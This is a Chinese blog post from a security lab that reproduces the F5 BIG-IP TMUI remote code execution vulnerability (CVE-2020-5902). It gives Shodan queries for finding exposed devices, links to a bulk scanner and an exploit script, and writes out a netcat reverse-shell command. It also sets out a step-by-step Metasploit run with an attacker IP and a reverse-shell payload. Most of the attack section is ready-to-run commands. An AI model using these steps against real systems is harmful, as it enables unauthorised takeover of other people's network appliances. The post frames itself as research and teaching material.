本文作者:Taoing(Ms08067实验室 SRSP TEAM小组成员)
0x0:漏洞概述
F5 BIG‐IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。2020年7月1日,F5官方公布流量管理用户界面(TMUI)存在 前台远程执行代码(RCE)漏洞(CVE‐2020‐5902)。攻击者利用该漏洞,构造恶意请求,在未授权的情况下获得目标服务器的权限,实现远程代码执行。
0x1:影响版本范围
F5 BIG‐IP < 15.1.0.4
F5 BIG‐IP < 14.1.2.6
F5 BIG‐IP < 13.1.3.4
F5 BIG‐IP < 12.1.5.2
F5 BIG‐IP < 11.6.5.2
0x2设备检索:
shodan
http.favicon.hash:‐335242539 2、http.title:"BIG‐IP® ;‐ Redirect"
0x3shodan批量脚本:
https://github.com/aqhmal/CVE‐2020‐5902‐Scanner
1.下载脚本后安装库文件, pip3 install ‐r requirements.txt
2.打开脚本文件scanner.py,加入自己shodan key
3.开干 python3 scan.py
0x4漏洞复现:
https://github.com/jas502n/CVE‐2020‐5902
更改CVE‐2020‐5902.py 里的url,然后直接运行 python CVE‐2020‐5902.py。这里我使用的是python2 运行
反弹shell:nc ‐e /bin/bash ip port
监听:nc ‐lvvp port
Msf坑之多:
1.开始我使用wget最后各种问题。直接浏览器下载。拖进msf
https://github.com/rapid7/metasploit‐framework/blob/0417e88ff24bf05b8874c953bd91600f10186ba4/modules/exploits/linux/http/f5_bigip_tmui_rce.rb
2.解决方法:
下载后拖进去
﴾/usr/share/metasploit‐framework/modules/exploits/linux/http/﴿
打开msf依次执行
msfconsole reload_all search f5_bigip
use exploit/linux/http/f5_bigip_tmui_rce
set rhost 1.2.3.4
set lhost 129.204.113.202
set lport 5567
set payload cmd/unix/reverse_python
run
0x5:总结:
坑点:msf最好在云上,虚拟机啥的弹不了
扫描下方二维码加入星球学习
加入后会邀请你进入内部微信群,内部微信群永久有效!
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论